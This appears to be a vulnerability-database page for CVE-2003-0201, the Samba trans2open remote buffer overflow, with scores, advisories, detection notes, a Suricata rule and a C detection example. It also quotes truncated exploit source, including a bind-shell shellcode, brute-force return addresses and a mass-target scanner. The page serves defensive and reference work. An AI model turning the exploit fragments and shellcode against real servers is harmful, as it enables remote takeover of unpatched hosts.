CVE-2003-0201
Published 2003-05-05
CVE-2003-0201: Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2…
Priority P2 · 70 · critical · CVSS 2.0 base score 10.0 · AV:N/AC:L/Au:N/C:C/I:C/A:C
Tags: ITW · Exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS 84.50% (99.7th percentile)
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Affected
86 ranges · showing 25. The 25 rows rendered here collapse to two distinct vendor/product pairs, and no version range or fixed-in data is given for any of them.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | mac_os_x | — | — |
| compaq | tru64 | — | — |
Detection & IOCs (extracted from sources)
bytes: captured exploit packet (NetBIOS session header, SMB header, trans2 words, ByteCount, then the start of the NOP sled)
\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90
bytes: linux_bindcode (truncated)
linux_bindcode: \x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51\x89\xe1\xb3\x01\xb0\x66\xcd\x80...
bytes: exploit_data (truncated; begins at the SMB word-count byte, i.e. offset 36 of the packet above)
exploit_data: \x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90
- The exploit packet begins with the 4-byte NetBIOS session header \x00\x04\x08\x20 (message type 0x00, flags 0x04, length 0x0820) followed by \xff\x53\x4d\x42 (the "\xffSMB" magic) and \x32 (SMB_COM_TRANSACTION2). The two length bytes follow the exploit's total packet size, so do not key on them: match the 0x00 message type at offset 0 and "\xffSMB\x32" at offset 4 on TCP/139, as the Suricata rule below does, and pair that with a size check on the trans2 parameter count, because legitimate TRANSACT2_OPEN requests carry exactly the same prefix.
- The published proof-of-concept fills the buffer with 3000 bytes of 0x90 NOPs and places a short JMP (0xEB 0x70) at offset 1096/1097 of the buffer. A long 0x90 run followed by a short JMP inside an SMBtrans2 parameter block is a strong indicator for the published exploits, and only for them: any other NOP-equivalent sled defeats it.
- The Metasploit BSD and Solaris variants overwrite the return address at a fixed offset (1055 for BSD, 1103 for Solaris) inside a 1988-byte random-text pattern sent in the SMBtrans2 request. A trans2 parameter block of exactly 1988 bytes is a signal for those modules; a parameter count larger than Samba's 1024-byte pstring is the more general one.
- The exploit performs an anonymous SMB session setup and then sends the trans2 packet; the captured packet above carries UserID 0x0064 (100) in its SMB header. Watch for an anonymous session setup followed immediately by a large SMBtrans2 request on port 139. The UserID value itself is exploit-specific and not a reliable key.
- The connect-back shellcode uses the hardcoded port 0xb0ef (45295 decimal). Alert on outbound TCP connections from smbd to port 45295 after an inbound SMBtrans2 anomaly; Metasploit payloads use whatever LPORT is configured, so treat any new outbound connection initiated by smbd as suspect.
- The bind shellcode listens on the same port 0xb0ef (45295). After a suspected attempt, check Samba servers for an unexpected listener on TCP/45295, and for any listening process whose parent is smbd.
- The Mac OS X PPC Metasploit module brute-forces return addresses from 0xbffffdfc down to 0xbfa00000 in steps of 512, sending one SMBtrans2 exploit packet per attempt. Brute forcing is practical because a miss only kills the forked smbd child serving that connection, so the observable is a rapid series of short-lived TCP/139 connections from one source.
- The vulnerability affects Samba 2.2.0 through 2.2.8, 2.0.10 and earlier 2.0.x releases, and Samba-TNG 0.3.1 and earlier. Samba 2.2.8a and Samba-TNG 0.3.2 are patched. Scope version detection to these ranges to avoid false positives on patched installs.
- The Metasploit modules note that they exploit systems "that do not have the noexec stack option set". Hosts with a non-executable stack need a return-into-libc style attack with different return addresses, so signatures keyed on NOP sleds may not fire against them, and a crashed smbd child may be the only trace.
- The exploit requires a completed SMB session setup (smb_login in Metasploit) before the malicious trans2 packet. Rules that inspect only the unauthenticated part of a session, or that stop inspecting once a session is established, will miss the payload.
- CVE-2003-1332 (reply_nttrans overflow in Samba 2.2.7a and earlier) is a different vulnerability from CVE-2003-0201 (call_trans2open). Do not conflate their signatures: the SMB commands differ (SMB_COM_NT_TRANSACT versus SMB_COM_TRANSACTION2).
CVSS provenance
| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 10.0 | CRITICAL | — |
| vulncheck | — | 10.0 | CRITICAL | — |
| vendor_debian | — | 10.0 | CRITICAL | — |
| vendor_redhat | — | 10.0 | CRITICAL | — |
GHSA · ghsa_unreviewed · 2022-05-03 · CVE-2003-0201 [HIGH]
GHSA-6mm7-g5cc-wpx6: Buffer overflow in the call_trans2open function in trans2
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
GHSA · ghsa_unreviewed · 2022-04-29 · CVE-2003-0196 [CRITICAL] · CVSS 10.0
GHSA-m4pp-9j7g-g832: Multiple buffer overflows in Samba before 2
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
GHSA · ghsa_unreviewed · 2022-04-29 · CVE-2003-1332 [CRITICAL] · CVSS 10.0
GHSA-g92c-j3f9-j6gh: Stack-based buffer overflow in the reply_nttrans function in Samba 2
Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and earlier allows remote attackers to execute arbitrary code via a crafted request, a different vulnerability than CVE-2003-0201.
OSV · osv · 2003-05-05 · CVE-2003-0196 [CRITICAL] · CVSS 10.0
CVE-2003-0196: Multiple buffer overflows in Samba before 2
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
OSV · osv · 2003-05-05 · CVE-2003-0201 [CRITICAL] · CVSS 10.0
CVE-2003-0201: Buffer overflow in the call_trans2open function in trans2
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
VulnCheck · vulncheck · 2003 · CVE-2003-0201 [CRITICAL] · CVSS 10.0
Samba / Samba: Out-of-bounds Write
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Affected: Samba (vendor) / Samba (product)
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=a9c54f79-d780-437b-a7f5-a74960e299d5&CommunityKey=8af7f28f-02f1-4107-8639-93a60b6546d4&tab=librarydocuments
Exploit PoC: https://vulncheck.com/xdb/bbe653fc30c4
Red Hat · vendor_redhat · 2003-04-07 · CVE-2003-0201 [CRITICAL] · CVSS 10.0
security flaw
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Red Hat · vendor_redhat · 2003-04-07 · CVE-2003-0196 [CRITICAL] · CVSS 10.0
security flaw
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
Debian · vendor_debian · 2003 · CVE-2003-1332 [CRITICAL] · CVSS 10.0
CVE-2003-1332: samba - Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and ea...
Stack-based buffer overflow in the reply_nttrans function in Samba 2.2.7a and earlier allows remote attackers to execute arbitrary code via a crafted request, a different vulnerability than CVE-2003-0201.
Scope: local
bookworm: resolved · bullseye: resolved · forky: resolved · sid: resolved · trixie: resolved
Debian · vendor_debian · 2003 · CVE-2003-0196 [CRITICAL] · CVSS 10.0
CVE-2003-0196: samba - Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to e...
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
Scope: local
bookworm, bullseye, forky, sid, trixie: resolved (fixed in 3.0)
Debian · vendor_debian · 2003 · CVE-2003-0201 [CRITICAL] · CVSS 10.0
CVE-2003-0201: samba - Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x befo...
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
Scope: local
bookworm, bullseye, forky, sid, trixie: resolved (fixed in 3.0)
Suricata · suricata · 2010-09-23 · CVE-2003-0201
GPL NETBIOS SMB trans2open buffer overflow attempt
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB trans2open buffer overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB2"; depth:5; offset:4; content:"|00 14|"; depth:2; offset:60; byte_test:2,>,256,0,relative,little; reference:bugtraq,7294; reference:cve,2003-0201; reference:url,www.digitaldefense.net/labs/advisories/DDI-1013.txt; classtype:attempted-admin; sid:2102103; rev:11; metadata:created_at 2010_09_23, cve CVE_2003_0201, confidence High, signature_severity Major, updated_at 2024_03_08;)
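The IOC bullets above and the Suricata rule both key on fixed bytes of the captured packet. The C program below is an added example, not code from this page, from Samba, or from any of the exploits listed here: it decodes a trans2 request at the offsets smbd's reply_trans2 reads them, reproduces the rule's content/byte_test matchers mechanically, and adds the check the rule lacks, a TotalParameterCount larger than the 1024-byte pstring that call_trans2open copies the file name into. The exploit bytes are the first 69 bytes of the packet quoted in the IOC section plus a few NOPs; the benign TRANSACT2_OPEN request and the DataOffset variant are constructed samples, and the UserID in the benign packet is an arbitrary value.

```c
/* Added example, not code from this page, Samba, or any exploit above: decode a
 * trans2 request at the offsets smbd's reply_trans2 reads (smb_uid=32, smb_wct=36,
 * smb_vwv0=37, smb_setup0=65), reproduce the matchers of Suricata sid 2102103
 * mechanically, and flag a parameter block larger than the 1024-byte pstring that
 * call_trans2open copies the file name into. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PSTRING_LEN          1024   /* Samba pstring size */
#define SMB_COM_TRANSACTION2 0x32
#define TRANSACT2_OPEN       0x0000

typedef struct {
    uint16_t uid;                /* SMB header UserID */
    uint16_t total_param_count;  /* smb_vwv0 */
    uint16_t subcommand;         /* smb_setup0 */
} trans2_req;

static uint16_t le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* First 69 bytes of the exploit packet quoted in the IOC section (NetBIOS header,
 * SMB header, trans2 words, ByteCount) plus the start of its NOP sled. */
static const uint8_t exploit_pkt[] = {
    0x00,0x04,0x08,0x20, 0xff,0x53,0x4d,0x42, 0x32,        /* NetBIOS, "\xffSMB", TRANSACTION2 */
    0x00,0x00,0x00,0x00, 0x00, 0x00,0x00,                  /* status, flags, flags2 */
    0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, /* pad */
    0x01,0x00, 0x00,0x00, 0x64,0x00, 0x00,0x00, 0x00,      /* tid pid uid=100 mid, wct=0 */
    0xd0,0x07, 0x0c,0x00, 0xd0,0x07, 0x0c,0x00,            /* tpscnt=2000 tdscnt mprcnt mdrcnt */
    0x00, 0x00, 0x00,0x00, 0x00,0x00,0x00,0x00, 0x00,0x00, /* msrcnt rsvd flags timeout rsvd */
    0xd0,0x07, 0x43,0x00, 0x0c,0x00, 0x14,0x08,            /* pscnt psoff=67 dscnt dsoff=2068 */
    0x01,0x00, 0x00,0x00, 0x00,0x00,                       /* suwcnt=1 setup[0]=OPEN bcc */
    0x90,0x90,0x90,0x90                                    /* NOP sled continues */
};

/* 0 on success, negative if this is not a parseable trans2 request. */
int parse_trans2(const uint8_t *buf, size_t len, trans2_req *out)
{
    if (len < 67 || buf[0] != 0x00) return -1;             /* session message only */
    if (memcmp(buf + 4, "\xff" "SMB", 4) != 0) return -2;
    if (buf[8] != SMB_COM_TRANSACTION2) return -3;
    out->uid = le16(buf + 32);
    out->total_param_count = le16(buf + 37);
    out->subcommand = le16(buf + 65);
    return 0;
}

/* Mechanical reproduction of the payload matchers in sid 2102103. */
int rule_2102103_matches(const uint8_t *buf, size_t len)
{
    if (len < 64 || buf[0] != 0x00) return 0;              /* content:"|00|"; depth:1 */
    if (memcmp(buf + 4, "\xff" "SMB2", 5) != 0) return 0;  /* content:"|FF|SMB2"; offset:4; depth:5 */
    if (buf[60] != 0x00 || buf[61] != 0x14) return 0;      /* content:"|00 14|"; offset:60; depth:2 */
    return le16(buf + 62) > 256;                           /* byte_test:2,>,256,0,relative,little */
}

/* Bit 1: the signature fired. Bit 2: the parameter block cannot fit a pstring. */
int assess_trans2(const uint8_t *buf, size_t len)
{
    trans2_req r;
    int flags = rule_2102103_matches(buf, len) ? 1 : 0;
    if (parse_trans2(buf, len, &r) == 0 && r.total_param_count > PSTRING_LEN) flags |= 2;
    return flags;
}

/* Constructed benign TRANSACT2_OPEN (not captured traffic): 28 zeroed bytes of
 * fixed parameter fields, then the NUL-terminated path. Returns 0 if it won't fit. */
size_t build_trans2open(const char *path, uint8_t *out, size_t cap)
{
    size_t plen = strlen(path) + 1, tpscnt = 28 + plen;
    size_t total = 4 + 32 + 1 + 30 + 2 + tpscnt;   /* NetBIOS, SMB hdr, wct, 15 words, bcc, params */
    if (total > cap || tpscnt > 0xFFFF) return 0;
    memset(out, 0, total);
    out[2] = (uint8_t)((total - 4) >> 8);
    out[3] = (uint8_t)(total - 4);
    memcpy(out + 4, "\xff" "SMB", 4);
    out[8] = SMB_COM_TRANSACTION2;
    put16(out + 32, 0x0801);               /* UserID: arbitrary for the sample */
    out[36] = 15;                          /* WordCount */
    put16(out + 37, (uint16_t)tpscnt);     /* TotalParameterCount */
    put16(out + 55, (uint16_t)tpscnt);     /* ParameterCount */
    put16(out + 57, 65);                   /* ParameterOffset from the SMB header start */
    out[63] = 1;                           /* SetupCount */
    put16(out + 65, TRANSACT2_OPEN);       /* Setup[0] = subcommand */
    put16(out + 67, (uint16_t)tpscnt);     /* ByteCount */
    memcpy(out + 69 + 28, path, plen);
    return total;
}

int main(void)
{
    uint8_t benign[256], variant[sizeof exploit_pkt];
    size_t blen = build_trans2open("\\share\\readme.txt", benign, sizeof benign);
    memcpy(variant, exploit_pkt, sizeof exploit_pkt);
    put16(variant + 61, 0);   /* same oversized params, different DataOffset bytes */
    printf("captured exploit: flags=%d\n", assess_trans2(exploit_pkt, sizeof exploit_pkt));
    printf("benign open     : flags=%d\n", assess_trans2(benign, blen));
    printf("header variant  : flags=%d\n", assess_trans2(variant, sizeof variant));
    return 0;
}
```

Compile with cc -std=c99 and run: the captured packet yields flags=3, the benign request 0, the variant 2. The variant is the point of the exercise: sid 2102103 anchors on payload bytes 60 to 63, which in the PoC layout are the DataCount high byte, DataOffset and the SetupCount low byte, none of which the overflow depends on, so a packet with the same 2000-byte parameter block and a different DataOffset slips past it. A TotalParameterCount above the pstring size is a property of any request that can overrun fname, since the file name lives inside that parameter block, which is why the size check belongs beside the signature rather than instead of it.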
Exploit-DB · exploitdb · 2010-07-14 · CVE-2003-0201
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9828 2010-07-14 17:27:23Z hdm $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# mixins omitted
	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Samba trans2open Overflow (Linux x86)',
			'Description' => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on x86 Linux systems that do not
				have the noexec stack option set.

				NOTE: Some older versions of RedHat do not seem to be vulnerable
				since they apparently do not allow anonymous access to IPC.
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
exploitdb·2010-06-21
CVE-2003-0201 Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Samba trans2open Overflow (Solaris SPARC)',
'Description' => %q{
This exploits the buffer overflow found in Samba versions
2.2.0 to 2.2.8. This particular module is capable of
exploiting the flaw on Solaris SPARC systems that do not
have the noexec stack option set. Big thanks to MC and
valsmith for resolving a problem with the beta version of
this module.
},
'A
Exploit-DB · exploitdb · 2010-06-21 · CVE-2003-0201
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9571 2010-06-21 16:53:52Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# mixins omitted
	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Samba trans2open Overflow (Mac OS X PPC)',
			'Description' => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
			},
			'Author'      => [ 'hdm', 'jduck' ],
			'Version'     => '$Revision: 9571 $',
			'References'  =>
				[
					[ 'CVE', '2003-0201' ],
					[ 'OSVDB', '4469' ],
					[ 'BID', '7294'
Exploit-DB · exploitdb · 2010-06-17 · CVE-2003-0201
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit)
---
##
# $Id: trans2open.rb 9552 2010-06-17 22:11:43Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	# mixins omitted
	def initialize(info = {})
		super(update_info(info,
			'Name'        => 'Samba trans2open Overflow (*BSD x86)',
			'Description' => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the flaw on x86 Linux systems that do not
				have the noexec stack option set.
			},
			'Author'      => [ 'hdm', 'jduck' ],
			'License'     => MSF_LICENSE,
			'Version'     => '$Revision: 9552 $',
			'References'  =>
				[
Exploit-DB · exploitdb · 2003-07-13 · CVE-2003-0201
Samba 2.2.8 - Brute Force Method Remote Command Execution
---
/*
 * Mass Samba Exploit by Schizoprenic
 * Xnuxer-Research (c) 2003
 * This code just for education purpose
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

int scan(char *fl, char *bind_ip);

void usage(char *s)
{
	printf("Usage: %s <file> <bind_ip>\n", s);
	exit(-1);
}

int main(int argc, char **argv)
{
	printf("Mass Samba Exploit by Schizoprenic\n");
	if (argc != 3) usage(argv[0]);
	scan(argv[1], argv[2]);
	return 0;
}

/* Reads one target per line from the list file and runs the exploit against
 * each; the per-target code is cut off in the excerpt below. */
int scan(char *fl, char *bind_ip)
{
	FILE *fp, *fstat;
	char buf[512];
	char cmd[100];
	int i;
	struct stat st;

	if ((fp = fopen(fl, "r")) == NULL) {
		fprintf(stderr, "File %s not found!\n", fl);
		return -1;
	}
	while (fgets(buf, 512, fp) != NULL)
	{
		if (buf[strlen(buf)-1] == '\n') buf[strlen(buf)-1] = 0;
		for (i=0;i
		[...]
	netbiosheader->type = 0x00; /* session message */
	netbiosheader->flags = 0x00;
	netbiosheader->leng
Exploit-DB · exploitdb · 2003-05-12 · CVE-2003-0201
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3)
---
// source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
/*
* Samba Remote Root Exploit by Schizoprenic from Xnuxer-Labs, 2003.
* Using connect back method and brute force mode.
* I just create & modify
Exploit-DB · exploitdb · 2003-04-11 · CVE-2003-0201
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1)
---
// source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
/*
**
** [+] Title: Samba v2.2.x call_trans2open() Remote Overrun exploit for XxxxBSD
** 11/Apr/2003
** [+] Exploit code: 0x82-Remote.54AAb4.xpl.c
Exploit-DB · exploitdb · 2003-04-10 · CVE-2003-0201
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
---
#include ... /* header names lost in extraction */

/* RFC 1002 NetBIOS session service header: type, flags, big-endian length */
typedef struct {
	unsigned char type;
	unsigned char flags;
	unsigned short length;
} NETBIOS_HEADER;

/* 32-byte SMB header; protocol is "\xffSMB", command 0x32 is TRANSACTION2 */
typedef struct {
	unsigned char protocol[4];
	unsigned char command;
	unsigned short status;
	unsigned char reserved;
	unsigned char flags;
	unsigned short flags2;
	unsigned char pad[12];
	unsigned short tid;
	unsigned short pid;
	unsigned short uid;
	unsigned short mid;
} SMB_HEADER;

int OWNED = 0;
pid_t childs[100];
struct sockaddr_in addr1;
struct sockaddr_in addr2;

/* Linux x86 bind shell; "\x66\x68\xb0\xef" pushes port 0xb0ef (45295) */
char linux_bindcode[] =
	"\x31\xc0\x31\xdb\x31\xc9\x51\xb1\x06\x51\xb1\x01\x51\xb1\x02\x51"
	"\x89\xe1\xb3\x01\xb0\x66\xcd\x80\x89\xc1\x31\xc0\x31\xdb\x50\x50"
	"\x50\x66\x68\xb0\xef\xb3\x02\x66\x53
Exploit-DB · exploitdb · 2003-04-07 · CVE-2003-0201
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit)
---
class Metasploit3 < Msf::Exploit::Remote
	# mixins omitted
	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Samba trans2open Overflow (Mac OS X)',
			'Description'    => %q{
				This exploits the buffer overflow found in Samba versions
				2.2.0 to 2.2.8. This particular module is capable of
				exploiting the bug on Mac OS X PowerPC systems.
			},
			'Author'         => [ 'hdm' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2003-0201'],
					[ 'OSVDB', '4469'],
					[ 'BID', '7294'],
					[ 'URL', 'http://www.digitaldefense.net/labs/advisories/DDI-1013.txt'],
				],
			'Privileged'     => true,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'MinNops'  => 512,
				},
			'Platform'       => 'osx',
			'Arch'           => ARCH_PPC,
			'Targets'        =>
				[
					['Stack Brute Force', { 'Rets' => [0xbffffdfc, 0xbfa00000, 512] } ],
				],
			'DisclosureDate' => 'Apr 7 2003',
			'DefaultTarget'  => 0))

		register_options(
			[
				Opt::RPORT(139)
			], self.class)
	end

	# Need to perform
Exploit-DB · exploitdb · 2003-04-07 · CVE-2003-0201
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4)
---
source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/22471.tar.gz
Exploit-DB · exploitdb · 2003-04-07 · CVE-2003-0201
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2)
---
/*
source: https://www.securityfocus.com/bid/7294/info
A buffer overflow vulnerability has been reported for Samba. The problem occurs when copying user-supplied data into a static buffer. By passing excessive data to an affected Samba server, it may be possible for an anonymous user to corrupt sensitive locations in memory.
Successful exploitation of this issue could allow an attacker to execute arbitrary commands, with the privileges of the Samba process.
It should be noted that this vulnerability affects Samba 2.2.8 and earlier. Samba-TNG 0.3.1 and earlier are also affected.
E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/78/files
*/
/* 0x333hate => samba 2.2.x remote root exploit
*
*
Exploit-DB · exploitdb · 2003-04-07 · CVE-2003-0201
Samba 2.2.x - Remote Buffer Overflow
---
#!/usr/bin/perl
###############
##[ Header
# Name: trans2root.pl
# Purpose: Proof of concept exploit for Samba 2.2.x (trans2open overflow)
# Author: H D Moore
# Copyright: Copyright (C) 2003 Digital Defense Inc.
# trans2root.pl -t -H -h
##

use strict;
use Socket;
use IO::Socket;
use IO::Select;
use POSIX;
use Getopt::Std;

$SIG{USR2} = \&GoAway;

my %args;
my %targets =
(
	# name        # default     # start       # end         # step  # function
	"linx86"  => [0xbffff3ff, 0xbfffffff, 0xbf000000, 512, \&CreateBuffer_linx86],
	"solx86"  => [0x08047404, 0x08047ffc, 0x08010101, 512, \&CreateBuffer_solx86],
	"fbsdx86" => [0xbfbfefff, 0xbfbfffff, 0xbf000000, 512, \&CreateBuffer_bsdx86],
);

getopt('t:M:h:p:r:H:P:', \%args);
my $target_type = $args{t} || Usage();
my $target_host =
Metasploit · metasploit
Samba trans2open Overflow (Mac OS X PPC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the bug on Mac OS X PowerPC systems.
Metasploit · metasploit
Samba trans2open Overflow (Solaris SPARC)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on Solaris SPARC systems that do not have the noexec stack option set. Big thanks to MC and valsmith for resolving a problem with the beta version of this module.
Metasploit · metasploit
Samba trans2open Overflow (Linux x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set. NOTE: Some older versions of RedHat do not seem to be vulnerable since they apparently do not allow anonymous access to IPC.
Metasploit · metasploit
Samba trans2open Overflow (*BSD x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set.
Bugzilla · bugzilla · 2018-08-16 · CVE-2003-0196 [CRITICAL] · CVSS 10.0
CVE-2003-0196 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Multiple buffer overflows in Samba before 2.2.8a may allow remote attackers to execute arbitrary code or cause a denial of service, as discovered by the Samba team and a different vulnerability than CVE-2003-0201.
Bugzilla · bugzilla · 2018-08-16 · CVE-2003-0201 [CRITICAL] · CVSS 10.0
CVE-2003-0201 security flaw
Flaw bug created to hold information about an old flaw we knew something about. For more details see the MITRE CVE description.
Discussion:
MITRE description:
Buffer overflow in the call_trans2open function in trans2.c for Samba 2.2.x before 2.2.8a, 2.0.10 and earlier 2.0.x versions, and Samba-TNG before 0.3.2, allows remote attackers to execute arbitrary code.
References
- ftp://patches.sgi.com/support/free/security/advisories/20030403-01-P
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000624
- http://marc.info/?l=bugtraq&m=104972664226781&w=2
- http://marc.info/?l=bugtraq&m=104974612519064&w=2
- http://marc.info/?l=bugtraq&m=104981682014565&w=2
- http://marc.info/?l=bugtraq&m=104994564212488&w=2
- http://www.debian.org/security/2003/dsa-280
- http://www.digitaldefense.net/labs/advisories/DDI-1013.txt
- http://www.kb.cert.org/vuls/id/267873
- http://www.mandriva.com/security/advisories?name=MDKSA-2003:044
- http://www.novell.com/linux/security/advisories/2003_025_samba.html
- http://www.redhat.com/support/errata/RHSA-2003-137.html
- http://www.securityfocus.com/bid/7294
